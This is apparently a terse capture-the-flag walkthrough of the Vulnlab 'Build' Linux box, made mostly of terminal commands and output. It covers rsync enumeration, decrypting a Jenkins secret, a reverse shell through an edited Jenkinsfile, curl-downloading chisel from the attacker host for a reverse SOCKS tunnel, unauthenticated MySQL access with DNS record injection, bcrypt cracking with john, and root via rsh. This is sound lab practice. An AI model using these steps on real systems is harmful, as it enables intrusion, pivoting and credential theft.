vulnlab-build
an easy Linux box
.
rsync enum
└─$ rsync -av --list-only rsync://10.10.94.243 backups backups └─$ rsync -r rsync://10.10.94.243::backups
Dycrypting Jenkins pasword
┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets] └─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml Git<redacted>!
Login to Gitea as user buildadm, and get RCE by editing the jenkinsfile
Start a netcat listener to catch the shell
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}
run chisel server
┌──(puck㉿kali)-[~/vulnlab/build] └─$ chisel server -p 8000 --reverse 2024/08/09 10:26:20 server: Reverse tunnelling enabled 2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE= 2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000 2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
from docker
# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 8506k 100 8506k 0 0 8620k 0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root 4096 Aug 9 08:25 .
drwxr-xr-x 1 root root 4096 May 9 18:50 ..
lrwxrwxrwx 1 root root 9 May 1 14:37 .bash_history -> /dev/null
-r-------- 1 root root 35 May 1 17:37 .rhosts
drwxr-xr-x 2 root root 4096 May 1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug 9 08:25 chisel
-rw------- 1 root root 37 May 1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)
.
nmap the host
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
512/tcp open exec
513/tcp open login
514/tcp open shell
873/tcp open rsync
3000/tcp open ppp
3306/tcp open mysql
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
┌──(puck㉿kali)-[~/vulnlab/build]
Do the mysql thing
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.18.0.1:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| powerdnsadmin |
| sys |
+--------------------+
5 rows in set (0.025 sec)
MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password | firstname | lastname | email | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| 1 | admin | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin | admin | admin@build.vl | NULL | 1 | 0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)
MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name | type | content | ttl | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| 8 | 1 | db.build.vl | A | 172.18.0.4 | 60 | 0 | 0 | NULL | 1 |
| 9 | 1 | gitea.build.vl | A | 172.18.0.2 | 60 | 0 | 0 | NULL | 1 |
| 10 | 1 | intern.build.vl | A | 172.18.0.1 | 60 | 0 | 0 | NULL | 1 |
| 11 | 1 | jenkins.build.vl | A | 172.18.0.3 | 60 | 0 | 0 | NULL | 1 |
| 12 | 1 | pdns-worker.build.vl | A | 172.18.0.5 | 60 | 0 | 0 | NULL | 1 |
| 13 | 1 | pdns.build.vl | A | 172.18.0.6 | 60 | 0 | 0 | NULL | 1 |
| 14 | 1 | build.vl | SOA | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 | 0 | 0 | NULL | 1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)
MariaDB [powerdnsadmin]>
MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
-> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)
MariaDB [powerdnsadmin]>
.
┌──(puck㉿kali)-[~/vulnlab/build] └─$ john admin.hash Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 4096 for all loaded hashes Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Proceeding with wordlist:/usr/share/john/password.lst wi<redacted>on (?) 1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier Use the "--show" option to display all of the cracked passwords reliably Session completed.
Install rsh client on kali box
┌──(puck㉿kali)-[~/vulnlab/build] └─$ sudo apt-get install rsh-redone-client
rsh to build.vl machine as root
┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Aug 9 08:42:41 AM UTC 2024
System load: 0.64306640625
Usage of /: 62.7% of 9.75GB
Memory usage: 60%
Swap usage: 0%
Processes: 144
Users logged in: 0
IPv4 address for br-f8002c9d7234: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens5: 10.10.94.243
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~#
That was fun.